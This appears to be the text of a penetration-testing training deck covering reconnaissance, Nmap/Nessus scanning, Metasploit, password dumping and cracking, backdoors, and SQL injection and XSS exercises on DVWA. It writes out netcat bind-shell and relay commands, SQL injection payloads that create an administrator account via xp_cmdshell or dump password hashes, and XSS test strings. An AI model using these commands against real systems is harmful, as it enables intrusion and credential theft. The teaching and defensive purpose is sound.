Agenda

❖ Hacking steps
❖ System hacking
❖ Web application hacking

Hacking Steps

1 2

How to attack our servers? Security components

❖ Systems
❖ OS
❖ Software installed

❖ Network
❖ Sniffer
❖ Spoofing
❖ Flooding / DDoS

❖ Applications
❖ Data
❖ Operation

3 4
 Risk Information Security Principles

X"

Vulnerabili*es, Threats(

Loss$,$Damage$

5 6

The Elements of Risk

PART 0
Preparing before Pentest

7 8
 General Attack Lifecycle Attack Methodology
Footprinting Gathering broad publiclyavailable information, ARIN, IANA, web sites

Scanning Using info from above, see what services run, ports opened, OS used

Profiling
Use specific OS/ service enumeration techniques to gather user
Enumeration account/ shared/ exported info
Entering
Penetration First real attack phase
Concealing Penetration Failed Penetration Success

Denial of Service Elevation of Privilege Attempt to become root/ superuser/ admin

Compromising
Either:
Pilfering of Data Altering & copying data
Empowering •Tactics of last resort, an action of
desperation (good job on your
part)
•Relatively unskilled attacker
Cover Tracks Edit / erase audit logs

Leaves Backdoor For next visit… hihihihihi

9 10

VA vs. Pentest Inside Pentest Mindset

Vulnerability Assessment (VA) Successful pentesters & ethical hackers
• Some called it Security Assessment • Thinking out of the box, be pragmatic, do things differently
• Classified the system vulnerabilities into risk level (high, medium, low) • But, still need to be thorough, methodical, careful (with good notes taken)
Penetration Testing (Pentest) & make the work repeatable
• Implement VA as part of the process + Proof of Concept Balance between both is the most crucial factor
• Try to as much as possible make the management visualize, in terms of • Having the creative & “thinking like a bad guy” mindset
business risk
• Propose every method to be used during the scoping & rules of
Security Posture Assessment (SPA) engagement (RoE)
• Quite famous recently (past 4-5 years)
• Not only focus on the technology alone but the people + process (with
policy)

11 12
 Overall PenTest Process Public Pentest Methodologies
Preparation • Various organizations have released free network scanning and
• If applicable, sign Non-Disclosure Agreement (NDA) penetration testing methodologies
• Discuss the nature of test with target personnel (business concern, rules • They can provide useful source documentation for formalizing your own
of engagement, test scope) customized test plan
• Sign off on the permission (free out-of-jail card) • Some of notable references
• Assign the team • Open Source Security Testing Methodology Manual (OSSTMM) from
ISECOM
Testing
• NIST Special Publication 800-42: Guideline to Network Security Testing
• Perform detailed testing (internal & external) - depend on the scope
• Open Web Application Security Project (OWASP)
Conclusion
• Penetration Testing Framework from Toggmeister
• Analyze test results & retest (with documentations)
• Prepare a thorough report & presentation

13 14

Activities
❖ Footprinting
❖ Scanning
❖ Exploitation
❖ Post Exploitation
❖ Password
❖ Backdoor / Trojan

PART 1
Footprinting

15 16
 Footprinting - Google Dorks Search people
❖ Some of common Google keyword searches:
❖ intitle: index of “parent directory”
❖ inurl:.go.th
❖ filetype: or ext:
❖ site: operator
❖ admin login page
❖ intranet | help.desk

johny.ihackstuff

17 18

Social Networking Attack War Dialing

❖ All details published - phone ❖Technique of using a modem to automatically scan a list
numbers, date of birth, email, of telephone numbers (in searching for computers,
nicknames, pets’ names etc. bulletin board system, fax etc)
❖ Contribute towards:
❖ Answering secret questions
❖ Generate dictionary list for
password attack
❖ Real-time location
❖ Social engineering

19 20
 IP Address What can we know more about IP?
❖ Dotted Decimal ❖ IP Owner’s name or Provider
❖ 192.168.20.59 ❖ Contact point
❖ Binary ❖ Email address
❖ 11000000.10101000.00010100.00111011 ❖ Telephone number

❖ Decimal ❖ Route
❖ 3232240699 ❖ Active or not?
❖ Hexadecimal ❖ Opened ports
❖ 0xC0.0xA8.0x14.0x3B ❖ Vulnerabilities

21 22

Recommended tools Whois

❖ Whois – IP address information ❖ IP registration database
❖ Tracert/Traceroute – Determine the path to another host ❖ http://www.dnstuff.com
❖ Ping – Detect if another host is reachable
❖ nslookup – Resolve DNS
❖ Dig – Utility for checking DNS resolution
❖ Wireshark – Network sniffer (use with cares)
❖ Nmap – Port scanner (use with cares)
❖ Nessus – Vulnerability scanner (use with cares)

23 24
Whois result Tracert / Traceroute

25 26

Ping nslookup

27 28
 Dig Exercises
❖ Use google dorks keyword
❖ Check your server’s IP address and other
information
❖ Discuss what you found

29 30

Scanning
• Scanning is meant to know live machines, open & closed ports, service
versions, OS used.

• Include also vulnerability detection (based on signature)

PART 2
Scanning

31 32
 Goal of Scanning Scan using Nmap
❖ Overall: Learning more about the target and find
openings by interacting with the target
❖ Determine network addresses of live hosts, firewall,
routers, etc, in the network
❖ Determine network topology of the target environment
❖ Determine the operating system types of discovered
hosts
❖ Determine the open ports & services (with versions, if
possible - via banner grabbing/test)
❖ Determine the list of potential vulnerabilities

33 34

Nmap Active OS Fingerprinting Method for discovering vulnerabilities

Nmap attempts to determine target OS by sending various packets and ❖ Check software version number (includes protocol
measuring the response. version)
Different system have different protocol behaviors that can be triggered &
❖ Look at its behaviors - somewhat invasive
measured (30 different methods in 2nd Gen OS FP) ❖ Check for its configuration - more invasive
• TCP ISN Greatest Common Denominator (GCD)
❖ Requires access to target
• TCP ISN Counter Rate (ISR)
❖ Or configuration documentation from target environment
• TCP/ICMP IP ID Sequence Generator Algorithm
personnel
• Shared IP ID Sequence Boolean
❖ Run exploit against it - potentially dangerous but useful
• TCP Timestamp Option Algorithm
❖ Successful exploit shows the vulnerability is present
• TCP Initial Windows Size ❖ Helps to lower false positive (failed exploits don’t indicate
secure system)

35 36
 Nmap Nmap (Windows)
❖ Port scanning tools
❖ Both GUI and Command line
❖ Free download at http://www.nmap.org
❖ Compatible with Windows, Linux and MacOS
❖ Last version is 5.6x

37 38

Nessus Nessus
❖ Free download at http://www.nessus.org
❖ Vulnerabilities Scanner
❖ Last version is 5
❖ Compatible with Linux, MacOS and Windows
❖ 2 Softwares
❖ Nessus Server
❖ Nessus Client

39 40
 Exercises
❖ Use Nessus to scan my server
❖ Use Nmap
❖ nmap -sn 192.168.100.0
❖ nmap -sS 192.168.100.20

❖ Use MBSA
❖ try your machine
❖ try 172.17.50.130

PART 3
Exploitation

41 42

Exploitation About Metasploit

• Attackers will either exploit the known services by manually write exploit ❖ Exist in various versions since July 2003.
codes or used available exploitation frameworks – Metasploit/CANVAS/ ❖ Version 1.0 by HD Moore (Perl scripting language &
Core Impact provided a curses-based frontend)
❖ 2nd version (2.x), collaboration between spoonm,
Matt Miller (skape), HD Moore and other small
contributors (also in Perl)
❖ 3rd version (inclusive current) developed by
Metasploit LLC, is a complete rewrite using Ruby
language.
❖ Made available for use by Rapid7 under 3-clause
BSD license

43 44
 Metasploit Features Metasploit Framework Components
❖Runs on various OS platform (Windows, Linux, BSD &
MacOS X) User interface
❖ Also able to run on Linux-based PDA, iPhone (Jail-broken) Exploit Development
Support Tools
❖ Support wide-range of exploits & updated on regular Exploit 1 Payload 1
basis Payload
injection tools
Vuln finding
tools
❖ Current version (3.x) use ‘svn update’ Exploit 2 Payload 2
Armoring
❖ Not only home of Windows OS & services exploits but also Memory region
tools (to dodge
size, location &
include client-side attacks & appliance vulnerabilities Exploit n Payload n detection &
offset helper
filter)
❖Developer-friendly & ready for use payload
❖ Many features built-in (Windows SP independence, retrieving
stack pointer, various encoders, converter from exe to vbs, etc)
Exploit Payload Tgt Info Launcher Send to target

❖ Payload: even support 64-bit platform & IPv6 infrastructure

45 46

Interacting with Metasploit Interacting with Metasploit

GUI interface
(Armitage)
GUI interface
(msfgui)

47 48
 List of exploits List of Payloads
❖Common Windows OS vulnerabilities & services exploit ❖Customized payload to suit OS platform
❖ Windows Plug and Play Overflow ❖ Windows/ Linux/ Solaris/ AIX/ BSD/ OSX
❖ Microsoft ASN.1 attack against LSASS
❖ RPC DCOM (several)
❖Some of payload types
❖Other OSes vulnerabilities (UNIX, Linux, Mac OS X, BSD) ❖ singles: stand-alone (everything bundled)
❖ HP Openview connectedNodes.ovpl Remote Command Execution ❖ stagers: piece-parts which load first to allow stage to
❖ AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer communicate later
Overflow ❖ stages: piece-parts which implement the function through
❖Client-side components
stager
❖ AOL Instant Messenger goaway Overflow
❖ stagers (comm) + stages (function) = full payload
❖ Microsoft Excel Malformed FEATHEADER Record Vulnerability
❖Back-up solutions ❖Windows Singles
❖ VERITAS NetBackup Remote Command Execution ❖ adduser, exec, download_exec, shell_bind_tcp,
❖ Arkeia Backup Client Type 77 Overflow shell_bind_tcp_xpfw

49 50

Stager + Stage VNCInject Stage

❖ Windows Stager
❖ bind_tcp: listen on a tcp port for new connection (IPv6, No NX or
Win7)
❖ find_tag: use existing TCP connection that exploit was delivered over
❖ reverse_tcp: make a reverse connection from target back to attacker
(IPv6, No NX or Win7)
❖ reverse_ord_tcp: make reverse connection using ws2_32.dll already
loaded into memory of exploited process
❖ passivex: run ActiveX control in IE for reverse HTTP communication
❖ Windows Stage
❖ dllinject: inject arbitrary DLL into target memory
❖ upexec: upload and run an executable
❖ vncinject: VNC remote GUI control
❖ shell: Windows cmd.exe shell
❖ meterpreter: flexible specialized shell environment

51 52
 Meterpreter
❖ Meterpreter = Metasploit Interpreter
❖ Most of hard-core development done by Skape
❖ Consist of a series of DLLs injected into process memory
❖ Meterpreter (for Linux & Mac OS X) also available
❖ Extensive modules
❖ Core: sysinfo, shutdown, reboot, reg
❖ Stdapi: file system (cd, cat, download, mkdir, edit), process (getpid, ps,
kill, migrate), network (ipconfig, portfwd, route)
❖ Additional module, Priv: timestomp, hashdump, Incognito: token
stealing
❖ Ready-made scripts for various functionalities
❖ Why Meterpreter?
❖ Does not create separate process (run inside exploited process) PART 4
❖
❖
Pure manipulation of memory, does not touch hard drive
Does not need any system-provided command executables (all built-in)
Post Exploitation - Password

53 54

Human and Password Password Weakness

❖ Password are everywhere ❖ Users choose passwords that are easy to remember and
❖ OS login, online account (banks, email, various systems) often choose the same sequence of characters as they
❖ Human, however have for their UserIDs.
❖ Hard to memorized meaningless & complex word ❖ Users also frequently select names of family members,
❖ Based on study: average 3 uniques strong passwords their pets, or their favorite sports team for their
(highest entropy) for each human (max 5) passwords.
❖ Though many technologies allows resetting ❖ Users frequently use the same password for all accounts
password, but pentest may include password on many systems.
recovery (brute-force/ dictionary) ❖ If one account is broken, all other accounts are subsequently
❖ Broken one password could leap into more resource also vulnerable to attack.

to the case.

55 56
 Windows password Obtaining windows password
❖ Locally, in SAM database, Windows store password as: ❖ Pull hashes from local SAM as well as AD database
❖ LANMAN hash (Extremely weak) ❖ DLL injection into LSASS process (to extract hashes)
❖ NT Hash (Stronger) ❖ using Windows CreateRemoteThread API
❖ When complete, tools delete artifacts left on the target’s file
Both are not salted! system
❖ Default: Both hashes stored in NT, 2000, XP & 2003. ❖Pwdump family
Only NT Hash stored in Vista & 2008 (although can be ❖ pwdump2 to pwdump3 (may crash LSASS due to Windows DEP,
force to reboot)
altered). ❖ pwdump3e to pwdump6 (low chance of crash - marking injected
❖ With AD, domain controllers store account information, code as executable, encrypt hashes as they move across network)
including both hashes, in %systemroot%\ntds\ntds.dit ❖Fgdump (from Fizzgig, Foofus hacking group)
❖ Typically quite large (more than 50MB although for a few ❖ Addresses problem with AV tools deleting pwdump programs and
accounts) DLLs copied to the target file system for extraction
❖ Before moving files, fgdump remotely disables AV tools and then
❖ No parsing tool publicly released
moves files to dump password hashes

57 58

Obtaining windows password Linux password

❖ Metasploit Meterpreter hashdump capability ❖Rely on underlying crypt(3) function of OS
❖ Using Metasploit priv module (dump from local machine) ❖ Input: user’s password, random salt
❖ Not require remote NetBIOS or SMB access ❖ Output: text string
❖ Does not copy files to target’s file system
❖ Stored in /etc/passwd or /etc/shadow
❖ Entirely memory resident with a DLL running inside
exploited process (smaller footprint for forensic ❖Algorithm used to formulate password representation
investigator) varies
❖ Do not have issues with DEP ❖ Traditional DES - old Linux/ UNIX (some still use it)
❖Sniffing Windows Challenge-Response Authentication ❖ MD5 - the most common now (hash start with $1$)
❖ Dealing with LANMAN challenge/response, NTLMv1, ❖ BSDi Extended DES (hash start with _ )
NTLMv2, Microsoft Kerberos ❖ SHA-256 (prefaced by $5$), SHA-512 (prefaced by $6$)
❖ Before moving files, fgdump remotely disables AV tools
and then moves files to dump password hashes - used by some Linux distros

59 60
 Obtaining Linux password Cain & Abel
❖ Grab a copy of /etc/passwd ❖ Written by Massimiliano Montoro (free at www.oxid.it)
❖ Mainly focus on password cracking (but can do more!)
❖ Contains login names, UID numbers and possibly ❖ Windows-type passwords (LANMAN, NT, LANMAN challenge/response,
password representation (if not shadowed) NTLMv1, NTLMv2, MS Kerberos5 PreAuth)
❖ Readable by any account on system ❖ Non Windows password (Cisco IOS Type 5 enable, Cisco PIX enable,
APOP-MD5, VNC-3DES, RADUS Pre-Shared Secret, IKE Pre-Shared Key,
❖ Grab a copy of /etc/shadow Oracle, MySQL and many more)
❖ Contains password representations, security settings, etc. ❖ NOT SUPPORT: DES and MD5 Linux/ UNIX password (since it is salted)
❖ It also can sniff password (or password hashes) directly from the
❖ Readable only by accounts with UID 0
network
❖ Combined the two together with script ❖ Other features:
❖ John the Ripper’s unshadow script pulls account info ❖ SIP/ RTP-to-WAV file converter
❖ SecureID Token Generator
from /etc/passwd and password info from /etc/shadow, ❖ Box Revealer (reveal what’s behind ******* in password box via DLL
creating one resulting file suitable for cracking injection)
❖ Hash calculator

61 62

John the ripper Password Attack Methodology

❖ By Solar Designer & available for free at www.openwall.com/john ❖ Dictionary attack – fastest attack with large size of
❖ There are also commercial version John The Ripper Pro dictionary (more than 100k words)
❖ include pre-compilation, auto-detect of processor acceleration options ❖ Customized dictionary will give higher probability of success
(MMX, SSE2, etc) and big multilingual wordlist (around 4.1 million
❖ Try to use wyd from www.remote-exploit.org/
entries)
❖ Available for many flavors of Unix, Windows, DOS, BeOS, and codes_wyd.html
OpenVMS ❖ Brute-forcing attack – long time take & exhaustive
❖ Can crack a lot of password types:
search
❖ Linux/ UNIX: traditional DES - various modes, MD5, Blowfish, etc
❖ Windows: LANMAN (native), NT (with patch), LANMAN challenge/ ❖ Hybrid attack – combination of both brute force &
response (with patch & OpenSSL), NTLMv1 (also with patch &
OpenSSL) dictionary attack
❖ Others: S/Key (one-time password mechanism - hardly found today),
Kerberos v5, Andrew File System (AFS) Kerberos v4, Netscape LDAP
❖ Pre-Computed Password Hash table (PCPH) – ie.
SHA, MySQL Rainbow table containing most of password hashes

63 64
 Planting Malware
❖ Trojan: malicious, security breaking program that disgise as
useful program, mainly allow one to control a user’s system
❖ Like virus, trojans do not distribute itself from one system to another
❖ Back Orifice (port 31337 or 31338), Netbus (port 12345 or 12346),
Netcat, Tini
❖ Commonly distributed via peer-to-peer sharing, IRC, warez sites,
pornography sites
❖ Bots: software programs that perform some action on behalf of
human (with little or no human intervention)
❖ Used to control large numbers of systems (so-called bot-nets)
❖ Attacker usually control all infected machines (zombies) via
command & control center (C&C)
PART 4B ❖ Bot communication channels: IRC on standard port (TCP 6667), IRC

Post Exploitation - Backdoor / Trojan non standard port, distributed P2P communications, social
networking sites (Twitter, YouTubes, Google documents, etc)

65 66

Netcat - Backdoor Transformer - Malware in Disguise

❖ The most useful tool for both network admins & attackers ❖ Most of malware (especially backdoors) originally
❖ Application level backdoor listener (on both Windows & UNIX)
❖ Have a lot of great functions given/renamed themselves to other common names
❖ File transfer (both push & pull) - dealt in raw to the OS
❖ nc -l -p 1234 < tx_file_name
❖ UNIX/ Linux OSes
❖ nc 10.0.0.x 1234 > rx_file_name
❖ Provide shell access for Windows & Linux/ UNIX
❖ initd, init, inet, cron, network, httpd, httpb
❖ nc -l -p 1234 -e /bin/sh (Linux/ UNIX) ❖ MS Windows OSes
❖ nc -l -p 1234 -e cmd.exe ❖ svchost, win, iexplore
❖ Works as relay to other attacks
❖ cd /tmp
❖ Prior to Vista & Windows 2008, Task Manager and
❖ mknod backpipe p taskkill.exe cannot kill: csrss.exe, services.exe,
❖ nc -l -p 1234 0<backpipe | nc 10.0.0.x 4321 | tee backpipe smss.exe, system, system idle process, winlogon.exe
❖ Even can be use as simple port scanner
❖ nc -v -n -z -w1 10.0.0.x 1-1024

67 68
 Thank You

Web Application Security

Contact me Kitisak Jirawannakool

[email protected]
[email protected]
http://www.ega.or.th

69

Agenda Why we need?

! OWASP (Webgoat) ❖ Try by ourselves
❖ Access to your website which has login page
! Simplest hacking techniques
❖ Type “ ‘or’ ’=’ ” both username and password fields
! SQL injection
❖ Login and see the results
! Cross-site scripting
❖ Questions
! How to protect our website?
❖ Easy to hack?
❖ Do we know how to protect?

72
 What is an OWASP? Open Web Application Security Project
! Open Web Application Security Project
! http://www.owasp.org
! Open group focused on understanding and improving
the security of web applications and web services!
! Hundreds of volunteer experts from around the world

74

Problems Goals
Attack type Description Mitigation

• Theft of service
• Warez or pornography uploads Any of the network, web-server,
• Pirate servers and applications or application-based attacks Prepare for attacks.
System integrity
• Password sniffing that result in denial of service, a Inspect the application to
• Rootkit and Trojan program installation Denial of service
condition in which a system is remove application-based
• Distributed Denial of Service participation overloaded and can no longer attack points.
respond normally.
• Vandalism, data tampering, or site defacement
• Inadvertent file deletion or modification Data integrity

Create a secure initial

• Theft of personal information installation. Plan changes,
• Leakage of personal data into URLs and logs Data confidentiality and assess the impact of
These errors are our own fault.
Exploitation of changes before you make
Surprisingly, they happen more
• Unauthorized use of resources configuration errors them. Implement
often than you might think.
• Denial of Service independent assessment
• Crash/freeze from resource exhaustion (e.g., System and network of the configuration on a
availability regular basis.
memory, disk, process space, file descriptors,
or database connections)
 Attack type Description Mitigation Why we need web application security?
Your security “perimeter” has huge holes at
the application layer
Exploitation of Unpatched or unknown

Human Resources
Application Layer

Legacy Systems

Web Services
Apache problems in the Apache web Patch promptly.

Databases

Directories
Custom Developed Application

Billing
vulnerabilities server. Code
APPLICATION
ATTACK

Exploitation of Unpatched or unknown Assess web application

application problems in deployed web security before each
vulnerabilities applications. application is deployed. App Server

Web Server

Network Layer
Hardened OS

This is a "catch-all" category for

Firewall
all other unmitigated problems

Firewall
on the same network as the Do not expose unneeded
Attacks through
web server. For example, a services, and
other services
vulnerable MySQL database compartmentalize.
You can’t use network layer protection (firewall, SSL, IDS, hardening)
server running on the same to stop or detect application layer attacks
machine and open to the public.

78

Securing network is not enough What is Web Application Security?

❖ Network Security Mostly Ignores the Contents of HTTP ! Not Network Security
Traffic, such as.... ! Securing the “custom code” that drives a web application
❖ Firewalls, SSL, Intrusion Detection Systems ! Securing libraries
❖ Operating System Hardening, Database Hardening ! Securing backend systems
! Securing web and application servers
❖ Need to secure web application (Not Network Security)
! Network Security Mostly Ignores the Contents of HTTP
Traffic
❖ Securing the “custom code” that drives a web application ! Firewalls, SSL, Intrusion Detection Systems, Operating
❖ Securing libraries System Hardening, Database Hardening
❖ Securing backend systems
❖ Securing web and application servers

79
OWASP Top 10 Application Security Risks - 2010 What is WebGoat ?
1. Injection ! Deliberately insecure J2EE web application
2. Cross Site Scripting (XSS) ! Maintained by OWASP
3. Broken Authentication and Session Management
4. Insecure Direct Object References ! Designed to teach web application security lessons
5. Cross Site Request Forgery (CSRF) ! For example, in one of the lessons the user must use SQL
6. Security Misconfiguration injection to steal fake credit card numbers. The application
7. Insecure Cryptographic Storage is a realistic teaching environment, providing users with
8. Failure to Restrict URL Access hints and code to further explain the lesson.
9. Insufficient Transport Layer Protection ! Why the name "WebGoat"?
10.Unvalidated Redirects and Forwards ! Developers should not feel bad about not knowing security.
Even the best programmers make security errors. What they
https://www.owasp.org/index.php/Top_10_2010-Main need is a scapegoat, right? Just blame it on the 'Goat!

82

Overview Example of lessons

!WebGoat is written in Java and therefore installs on any ! Cross-site Scripting (XSS)
platform with a Java virtual machine. ! Access Control
!Need Java and Tomcat ! Thread Safety
! Hidden Form Field Manipulation
!Support Linux, OS X Tiger, FreeBSD and Windows
! Parameter Manipulation
!Once deployed, the user can go through the lessons and ! Weak Session Cookies
track their progress with the scorecard. There are currently ! Blind SQL Injection
over 30 lessons, including those dealing with the following ! Numeric SQL Injection
issues: ! String SQL Injection
! Web Services
! Fail Open Authentication
! Dangers of HTML Comments
! ... and many more!

83
 Weak Session Cookies
65432ubphcfx

DVWA DVWA
! Damn Vulnerable Web Application
! http://www.dvwa.co.uk
! PHP/MySQL
! Vulnerable web for security testing
! Freeware

Username : admin
Password : password
 DVWA Configure
! Setup -> Create/Reset Database
! DVWA Security -> Low -> Submit

Simplest hacking techniques SQL Injection Attacks

! SQL Injection “SQL injection is a security vulnerability that occurs in the database layer of
an application. Its source is the incorrect escaping of dynamically-generated
string literals embedded in SQL statements. “ (Wikipedia)
! Cross Site Scripting (XSS)
! Password attacking
 SQL Injections Impact of SQL Injection - Dangerous

❖At best: you can leak information

❖Depending on your configuration, a hacker can
❖Delete, alter or create data
❖Grant access to the hacker silently
❖Escalate privileges and even take over the OS

93

SQL Injection Attacks More Dangerous SQL Injection Attacks

❖Login Example Attack ❖Hacker creates a Windows Account:
– Text in blue is your SQL code, Text in orange is the
– SELECT * FROM users WHERE login = ‘’; exec
hacker input, black text is your application code
master..xp_cmdshell 'net users username
❖Login: Password: password /add';--’ and password= ’’
❖And then adds himself as an adminstrator:
❖Dynamically Build SQL String performing
authentication: – SELECT * FROM users WHERE login = ‘'; exec
❖“SELECT
master..xp_cmdshell 'net localgroup Administrators
* FROM users WHERE login = ‘” + userName +
“’ and password= ‘” + password + “’”; username /add';--’ and password= ‘’
❖SQL Injection examples are outlined in:
❖Hacker logs in as: ‘ or ‘’ = ‘’; -- – http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf

– SELECT * FROM users WHERE login = ‘’ or ‘’ = ‘’; --‘ – http://www.unixwiz.net/techtips/sql-injection.html

and password=‘’
 Preventing SQL injection Preventing SQL injection - Continued
❖Use Prepared Statements (aka Parameterized Queries)
❖“select
❖Use the principle of least privileges
* from accounts where id = “ + id
❖If the query is reading the database, do not run the query
vs
as a user with update permissions (dbo, drop, etc)
❖“select * from accounts where id =?”
– Quiz: Is running a Web Application as the Database
System Admin “sa” account a good practice?
❖Validate input
❖Strong typing ❖ESCAPE questionable characters (ticks, --, semi-colon,
❖If the id parameter is a number, try parsing it into an integer brackets, etc.)
❖Business logic validation
❖Ifyou are expecting a telephone number, test it with a Regular
Expressions

Ex.1 SQL Injection SQL Injection

❖ Learn to inject SQL command on DVWA
❖ Understand how weak web application is
❖ Learn how to prevent this attack
❖ Know how to program securely

99
 SQL Injection Try these commands and explain

! a' OR '1'='1

! ' UNION ALL SELECT user,password FROM users;#

! a' UNION ALL SELECT system_user(),user();#

http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://en.wikipedia.org/wiki/SQL_injection
http://www.unixwiz.net/techtips/sql-injection.html

Challenged questions Challenged questions

! Find the current version of MySQL ! Find the current version of MySQL
a’ UNION ALL SELECT 1, @@version;#
! List the password hashed ! List the password hashed
1′ UNION ALL SELECT user, password FROM mysql.user;
— priv;#’
! Find the database name
! Find the database name
a’ OR database() LIKE ‘%A%’;#
! Find the table name
! Find the table name
a’ UNION SELECT table_schema, table_name FROM
information_schema.tables WHERE table_schema LIKE
‘%dv%
 How to fix Cross Site Scripting (XSS)
! Check all input
! type
! size
! mysql_real_escape_string()

abc’ or ’1′=’1

abc\’ or \’1\’=\’1

The impact of XSS Preventing XSS

❖ Data residing on the web page can be sent
anywhere in the world ❖ Escape all user input when it is displayed
❖ Including cookies! ❖ Escaping converts the output to harmless html entities
❖ Facilitates many other types of attacks ❖ <script> becomes &lt;script&gt;
❖ Cross-Site Request Forgery (CSRF), Session Attacks ❖ but still displayed as <script>
(more later) ❖ Methods:
❖ Your site’s behavior can be hijacked ❖ Java Standard Tag Llibrary (JSTL) <c:out/>
❖ org.apache.commons.lang.StringEscapeUtils
❖NOTE: Java’s Expression Language (EL) does not escape output!

107
 Preventing XSS - Continued Ex.2 Cross-Site Scripting
❖ Learn to do XSS on DVWA
❖ Ensure your filter uses a white list approach
❖ Understand how weak web application is
❖ Filters based on blacklisting have historically been flawed
❖ E.g. Ruby on Rails sanitize method ❖ Learn how to prevent this attack
❖ New encoding schemes can easily bypass filters that use a ❖ Know how to program securely
blacklist approach
❖ Do not accept and reflect unsolicited input
❖ Reflecting every parameter for confirmation pages
❖ Printing out the session/request parameters in error pages
❖ Great XSS resource: http://ha.ckers.org/xss.html

110

Cross Site Scripting (XSS) Hands on

! <b>HTML Tag</b>

! <script>alert(“XXX”); </script>

! <img src=”http://www.aaa.com/a.jpg”>
 How to fix Input filtering
! htmlspecialchars() ! Input sanitizing
! FILTER_SANITIZE_SPECIAL_CHARS
cut HTML escape character (e.g. ‘ ” < > &)
! FILTER_SANITIZE_URL
cut non-alphabet, non-number and non $-_.+!*’(),{}|\
\^~[]`<>#%”;/?:@&=

! Logical filtering
! FILTER_VALIDATE_EMAIL
! FILTER_VALIDATE_INT

Follow me

Name : Kitisak Jirawannakool

Q/A
Facebook : http://www.facebook.com/kitisak.note

Email : [email protected]
[email protected]

Weblog : http://foh9.blogspot.com

Twitter : @kitisak